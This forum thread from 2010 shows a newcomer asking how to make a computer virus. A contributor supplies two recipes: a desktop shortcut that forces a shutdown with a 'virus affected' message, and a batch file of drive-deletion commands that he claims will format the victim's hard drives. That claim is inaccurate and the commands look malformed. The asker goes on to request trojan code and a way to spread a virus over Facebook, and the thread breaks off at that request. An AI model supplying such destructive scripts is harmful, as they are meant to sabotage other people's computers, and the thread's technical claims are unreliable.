new member how to make a virus

Light Poster
26Apr2010,23:12   #1
kalo's Avatar
how to make a virus
Go4Expert Founder
27Apr2010,09:43   #2
shabbir's Avatar
Welcome to the forum and just make a program that deletes all file can also be termed as virus. So what you want to know post it with details in the right forum
Contributor
27Apr2010,12:15   #3
satyedra pal's Avatar
you can create a small virus as:
Right click of mouse on desktop then new and then shortcut , and now write
shutdown -s -t 20 -c "virus affected" in the type the location of item text box
Now click on next and give the name as you want in the text Box.
kalo like this
Light Poster
27Apr2010,18:56   #4
kalo's Avatar
hi
do you know any more kind of virus you could tell me about how to make
Contributor
28Apr2010,12:16   #5
satyedra pal's Avatar
you can create another computer virus by using following code writing on notepad:

@echo off

DEL D: -Y
DEL E: -Y

now you can save it as filename.bat

These virus will format your hardderive as given the name of derive.
Light Poster
28Apr2010,18:45   #6
kalo's Avatar
Do you know avirus tomake that attack directly
Contributor
29Apr2010,15:58   #7
satyedra pal's Avatar
what type of attack do you want with a Virus.After running these virus will take action corresponding to your service.
Light Poster
29Apr2010,18:29   #8
kalo's Avatar
like trojan horse and 2k bomb
doyou know how send a virus through facebook
Contributor
30Apr2010,11:33   #9
satyedra pal's Avatar
I'm not aware with a virus for facebook. Trojan horse like virus has large coding.
Light Poster
30Apr2010,18:42   #10
kalo's Avatar
could you tell me the code